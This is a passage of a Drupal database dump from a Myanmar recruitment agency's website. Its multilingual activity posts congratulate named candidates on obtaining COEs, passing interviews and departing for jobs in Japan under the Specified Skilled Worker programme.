('activities', 0, 17, 120, 'en', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 120, 'ja', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 120, 'ko', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 148, 'en', 0, '<p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__field_activities_description` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_activities_description_value`, `field_activities_description_summary`, `field_activities_description_format`) VALUES
('activities', 0, 17, 148, 'ja', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 148, 'ko', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 149, 'en', 0, '<p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 149, 'ja', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 149, 'ko', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'en', 0, '<p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ja', 0, '<p>ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ko', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 68, 422, 'en', 0, '<p>Congratulations for two person entering JAPAN, HOKKAIDO City with Food Service (Restaurant)</p>', '', 'full_html'),
('activities', 0, 68, 423, 'en', 0, '<p>Congratulations for two person entering JAPAN, HOKKAIDO City with Food Service (Restaurant)</p>', '', 'full_html'),
('activities', 0, 68, 423, 'ja', 0, '<p>Congratulations for two person entering JAPAN, HOKKAIDO City with Food Service (Restaurant)</p>', '', 'full_html'),
('activities', 0, 68, 424, 'en', 0, '<p>Congratulations for two person entering JAPAN, HOKKAIDO City with Food Service (Restaurant)</p>', '', 'full_html'),
('activities', 0, 68, 424, 'ja', 0, '<p>Congratulations for two person entering JAPAN, HOKKAIDO City with Food Service (Restaurant)</p>', '', 'full_html'),
('activities', 0, 76, 445, 'en', 0, '<p>Congratulations for Nan Su Khaing &amp; Wut Yee Aung</p>', '', 'full_html'),
('activities', 0, 76, 447, 'en', 0, '<p>Congratulations for Nan Su Khaing &amp; Wut Yee Aung</p>', '', 'full_html'),
('activities', 0, 76, 447, 'ja', 0, '<p>Congratulations for Nan Su Khaing &amp; Wut Yee Aung</p>', '', 'full_html'),
('activities', 0, 77, 449, 'en', 0, '<p>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN!</p>', '', 'full_html'),
('activities', 0, 77, 450, 'en', 0, '<p>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN!</p>', '', 'full_html'),
('activities', 0, 77, 450, 'ja', 0, '<p>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN!</p>', '', 'full_html'),
('activities', 0, 78, 451, 'en', 0, '<p>Congrats to EI EI MON &amp; NYEIN EI EI SWE</p>', '', 'full_html'),
('activities', 0, 78, 452, 'en', 0, '<p>Congrats to EI EI MON &amp; NYEIN EI EI SWE</p>', '', 'full_html'),
('activities', 0, 78, 452, 'ja', 0, '<p>Congrats to EI EI MON &amp; NYEIN EI EI SWE</p>', '', 'full_html'),
('activities', 0, 80, 454, 'en', 0, '<p>Congratulations SHIN THANT PHYU &amp; YAMIN THET for departure to FUKUOKA City, JAPAN!&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 80, 455, 'en', 0, '<p>Congratulations SHIN THANT PHYU &amp; YAMIN THET for departure to FUKUOKA City, JAPAN!&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 80, 455, 'ja', 0, '<p>Congratulations SHIN THANT PHYU &amp; YAMIN THET for departure to FUKUOKA City, JAPAN!&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 83, 460, 'en', 0, '<p>COE For Khu Richard and Li Soung Oo</p>', '', 'full_html'),
('activities', 0, 83, 464, 'en', 0, '<p>COE For Khu Richard and Li Soung Oo</p>', '', 'full_html'),
('activities', 0, 83, 464, 'ja', 0, '<p>COE For Khu Richard and Li Soung Oo</p>', '', 'full_html'),
('activities', 0, 86, 466, 'en', 0, '<p>Getting COE For La Pyae Aung</p>', '', 'full_html'),
('activities', 0, 86, 467, 'en', 0, '<p>Getting COE For La Pyae Aung</p>', '', 'full_html'),
('activities', 0, 86, 467, 'ja', 0, '<p>Getting COE For La Pyae Aung</p>', '', 'full_html'),
('activities', 0, 87, 468, 'ja', 0, '<p>Things to beware while in JAPAN</p>', '', 'full_html'),
('activities', 0, 87, 469, 'en', 0, '<p>Things to beware while in JAPAN</p>', '', 'full_html'),
('activities', 0, 87, 469, 'ja', 0, '<p>Things to beware while in JAPAN</p>', '', 'full_html'),
('activities', 0, 87, 476, 'en', 0, '<p>Things to beware while in JAPAN</p>', '', 'full_html'),
('activities', 0, 87, 476, 'ja', 0, '<p>Things to beware while in JAPAN</p>', '', 'full_html'),
('activities', 0, 88, 470, 'en', 0, '<p>Congratulations Nilar Aung and Tin Zar Win Myint For Getting COE</p>', '', 'full_html'),
('activities', 0, 88, 471, 'en', 0, '<p>Congratulations Nilar Aung and Tin Zar Win Myint For Getting COE</p>', '', 'full_html'),
('activities', 0, 88, 471, 'ja', 0, '<p>Congratulations Nilar Aung and Tin Zar Win Myint For Getting COE</p>', '', 'full_html'),
('activities', 0, 89, 472, 'en', 0, '<p>Congratulations Thandar Moe And Pyae Sone Aung For Getting COE &nbsp;</p>', '', 'full_html'),
('activities', 0, 89, 473, 'en', 0, '<p>Congratulations Thandar Moe And Pyae Sone Aung For Getting COE &nbsp;</p>', '', 'full_html'),
('activities', 0, 89, 473, 'ja', 0, '<p>Congratulations Thandar Moe And Pyae Sone Aung For Getting COE &nbsp;</p>', '', 'full_html'),
('activities', 0, 91, 479, 'en', 0, '<p>Congratulations Hnin Ei Phyu and EI shwe zin and Aung zin Oo for getting Coe</p>', '', 'full_html'),
('activities', 0, 91, 480, 'en', 0, '<p>Congratulations Hnin Ei Phyu and EI shwe zin and Aung zin Oo for getting Coe</p>', '', 'full_html'),
('activities', 0, 91, 480, 'ja', 0, '<p>Congratulations Hnin Ei Phyu and EI shwe zin and Aung zin Oo for getting Coe</p>', '', 'full_html'),
('activities', 0, 92, 481, 'en', 0, '<p>Congratulations Yamin Thet And Shin Thant Phyu For Getting COE</p>', '', 'full_html'),
('activities', 0, 92, 482, 'en', 0, '<p>Congratulations Yamin Thet And Shin Thant Phyu For Getting COE</p>', '', 'full_html'),
('activities', 0, 92, 482, 'ja', 0, '<p>Congratulations Yamin Thet And Shin Thant Phyu For Getting COE</p>', '', 'full_html'),
('activities', 0, 93, 483, 'en', 0, '<p>Congratulations khaing hnin wai and ei ei phyo and ei ei min and nan thae nu soe for getting Coe</p>', '', 'full_html'),
('activities', 0, 93, 484, 'en', 0, '<p>Congratulations khaing hnin wai and ei ei phyo and ei ei min and nan thae nu soe for getting Coe</p>', '', 'full_html'),
('activities', 0, 93, 484, 'ja', 0, '<p>Congratulations khaing hnin wai and ei ei phyo and ei ei min and nan thae nu soe for getting Coe</p>', '', 'full_html'),
('activities', 0, 94, 485, 'en', 0, '<p>Congratulations Nyein Ei Ei Shwe and EI Ei Mon For Getting COE&nbsp;</p>', '', 'full_html'),
('activities', 0, 96, 488, 'en', 0, '<p>Congralutations Nyein Ei EI Shwe And Ei Ei Mon For Getting COE</p>', '', 'full_html'),
('activities', 0, 96, 489, 'en', 0, '<p>Congralutations Nyein Ei EI Shwe And Ei Ei Mon For Getting COE</p>', '', 'full_html'),
('activities', 0, 96, 489, 'ja', 0, '<p>Congralutations Nyein Ei EI Shwe And Ei Ei Mon For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 490, 'en', 0, '<p>Congralutations Yu Yu Nway and Win pyae Shan and Khin khin kyaw and hnin thazin aung and thet myat myat khaing For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 491, 'en', 0, '<p>Congralutations Yu Yu Nway and Win pyae Shan and Khin khin kyaw and hnin thazin aung and thet myat myat khaing For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 491, 'ja', 0, '<p>Congralutations Yu Yu Nway and Win pyae Shan and Khin khin kyaw and hnin thazin aung and thet myat myat khaing For Getting COE</p>', '', 'full_html'),
('activities', 0, 99, 494, 'en', 0, '<p>Congralutations Nan Su Khaing and Wut Yee Aung For Getting COE</p>', '', 'full_html'),
('activities', 0, 99, 495, 'en', 0, '<p>Congralutations Nan Su Khaing and Wut Yee Aung For Getting COE</p>', '', 'full_html'),
('activities', 0, 99, 495, 'ja', 0, '<p>Congralutations Nan Su Khaing and Wut Yee Aung For Getting COE</p>', '', 'full_html'),
('activities', 0, 103, 502, 'en', 0, '<p>Congratulations kaw myar and bue myar shar and ei ei nyein and lay lay naing and nang bwar kyi and phray myar and thu zar aung and hnin wah khine for getting COE</p>', '', 'full_html'),
('activities', 0, 103, 505, 'en', 0, '<p>Congratulations kaw myar and bue myar shar and ei ei nyein and lay lay naing and nang bwar kyi and phray myar and thu zar aung and hnin wah khine for getting COE</p>', '', 'full_html'),
('activities', 0, 103, 505, 'ja', 0, '<p>Congratulations kaw myar and bue myar shar and ei ei nyein and lay lay naing and nang bwar kyi and phray myar and thu zar aung and hnin wah khine for getting COE</p>', '', 'full_html'),
('activities', 0, 105, 506, 'en', 0, '<p>Congratulations Hnin Wai Wai and Thidar Khine For Getting COE</p>', '', 'full_html'),
('activities', 0, 105, 507, 'en', 0, '<p>Congratulations Hnin Wai Wai and Thidar Khine For Getting COE</p>', '', 'full_html'),
('activities', 0, 105, 507, 'ja', 0, '<p>Congratulations Hnin Wai Wai and Thidar Khine For Getting COE</p>', '', 'full_html'),
('activities', 0, 108, 512, 'en', 0, '<p>Congratulations Than Htun Naing and Aung Pyae Paing and Ei Khin and Htet Wai Aung and Lwin Phyo Ko Ko and Thae Ko Ko and Yu Yu Nyein For Getting COE</p>', '', 'full_html'),
('activities', 0, 108, 513, 'en', 0, '<p>Congratulations Than Htun Naing and Aung Pyae Paing and Ei Khin and Htet Wai Aung and Lwin Phyo Ko Ko and Thae Ko Ko and Yu Yu Nyein For Getting COE</p>', '', 'full_html'),
('activities', 0, 108, 513, 'ja', 0, '<p>Congratulations Than Htun Naing and Aung Pyae Paing and Ei Khin and Htet Wai Aung and Lwin Phyo Ko Ko and Thae Ko Ko and Yu Yu Nyein For Getting COE</p>', '', 'full_html'),
('activities', 0, 111, 518, 'en', 0, '<p>Congratulations Thet myat myat khaing and khin khin kyaw and hnin thazin aung and win pyae shan and yu yu nway for departure to japan&nbsp;</p>', '', 'full_html'),
('activities', 0, 111, 519, 'en', 0, '<p>Congratulations Thet myat myat khaing and khin khin kyaw and hnin thazin aung and win pyae shan and yu yu nway for departure to japan&nbsp;</p>', '', 'full_html'),
('activities', 0, 111, 519, 'ja', 0, '<p>Congratulations Thet myat myat khaing and khin khin kyaw and hnin thazin aung and win pyae shan and yu yu nway for departure to japan&nbsp;</p>', '', 'full_html'),
('activities', 0, 113, 522, 'en', 0, '<p>Congratulations Lwin Phyo Ko Ko and Aung Pyae Paing and Ei Khin and Than Htun Naing and thae ko ko and Yu yu nyein and htet lin aung for the departure to japan</p>', '', 'full_html'),
('activities', 0, 113, 523, 'en', 0, '<p>Congratulations Lwin Phyo Ko Ko and Aung Pyae Paing and Ei Khin and Than Htun Naing and thae ko ko and Yu yu nyein and htet lin aung for the departure to japan</p>', '', 'full_html'),
('activities', 0, 113, 523, 'ja', 0, '<p>Congratulations Lwin Phyo Ko Ko and Aung Pyae Paing and Ei Khin and Than Htun Naing and thae ko ko and Yu yu nyein and htet lin aung for the departure to japan</p>', '', 'full_html'),
('activities', 0, 146, 592, 'en', 0, '<p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p>', '', 'full_html'),
('activities', 0, 146, 593, 'en', 0, '<p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p>', '', 'full_html'),
('activities', 0, 154, 607, 'en', 0, '<p>Five candidates successfully departed for Japan on 14 June 2026 to begin employment under the Specified Skilled Worker (Kaigo) Program.</p>', '', 'full_html'),
('activities', 0, 154, 608, 'en', 0, '<p>Five candidates successfully departed for Japan on 14 June 2026 to begin employment under the Specified Skilled Worker (Kaigo) Program.</p>', '', 'full_html'),
('activities', 0, 154, 608, 'ja', 0, '<p>2026年6月14日、特定技能（介護）として5名の候補者が日本へ出発しました。</p>', '', 'full_html'),
('activities', 0, 154, 609, 'en', 0, '<p>Five candidates successfully departed for Japan on 14 June 2026 to begin employment under the Specified Skilled Worker (Kaigo) Program.</p>', '', 'full_html'),
('activities', 0, 154, 609, 'ja', 0, '<p>2026年6月14日、特定技能（介護）として5名の候補者が日本へ出発しました。</p>', '', 'full_html'),
('activities', 0, 156, 612, 'en', 0, '<p>On April 21, 2026, Ms. Thwel Thwel Aye successfully departed for Japan to begin her new career in the restaurant industry under the Specified Skilled Worker program.</p>', '', 'full_html'),
('activities', 0, 156, 613, 'en', 0, '<p>On April 21, 2026, Ms. Thwel Thwel Aye successfully departed for Japan to begin her new career in the restaurant industry under the Specified Skilled Worker program.</p>', '', 'full_html'),
('activities', 0, 156, 613, 'ja', 0, '<p>2026年4月21日、当機関を通じて採用された候補生、Thwel Thwel Ayeさんが特定技能（外食業）で日本へ出発いたしました。</p>', '', 'full_html'),
('activities', 0, 157, 614, 'ja', 0, '<p>2026年4月26日、当機関を通じて採用された候補生9名が、特定技能（外食業）で日本へ出発いたしました。</p>', '', 'full_html'),
('activities', 0, 157, 615, 'en', 0, '<p>On April 26, 2026, nine candidates from New Comet Agency successfully departed for Japan to begin their careers in the restaurant industry under the Specified Skilled Worker program.</p>', '', 'full_html'),
('activities', 0, 157, 615, 'ja', 0, '<p>2026年4月26日、当機関を通じて採用された候補生9名が、特定技能（外食業）で日本へ出発いたしました。</p>', '', 'full_html'),
('activities', 0, 160, 620, 'en', 0, '<p><strong>Ms. Toe Toe Hlaing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 160, 621, 'en', 0, '<p><strong>Ms. Toe Toe Hlaing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 160, 621, 'ja', 0, '<p><strong>TOE TOE HLAING さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 160, 660, 'en', 0, '<p><strong>Ms. Toe Toe Hlaing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 160, 660, 'ja', 0, '<p><strong>TOE TOE HLAING さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 161, 622, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 161, 623, 'en', 0, '<p data-start=\"122\" data-end=\"246\"><strong data-start=\"122\" data-end=\"246\">Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"248\" data-end=\"264\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 161, 623, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 161, 657, 'en', 0, '<p data-start=\"122\" data-end=\"246\"><strong data-start=\"122\" data-end=\"246\">Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"248\" data-end=\"264\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 161, 657, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 161, 658, 'en', 0, '<p data-start=\"122\" data-end=\"246\"><strong data-start=\"122\" data-end=\"246\">Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"248\" data-end=\"264\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 161, 658, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 161, 659, 'en', 0, '<p data-start=\"122\" data-end=\"246\"><strong data-start=\"122\" data-end=\"246\">Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"248\" data-end=\"264\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 161, 659, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 164, 628, 'en', 0, '<p>Ms. Su Myat Win successfully departed for Japan on 14 June 2026 to begin her career under the Specified Skilled Worker (Hotel) Program.</p>', '', 'full_html'),
('activities', 0, 164, 629, 'en', 0, '<p>Ms. Su Myat Win successfully departed for Japan on 14 June 2026 to begin her career under the Specified Skilled Worker (Hotel) Program.</p>', '', 'full_html'),
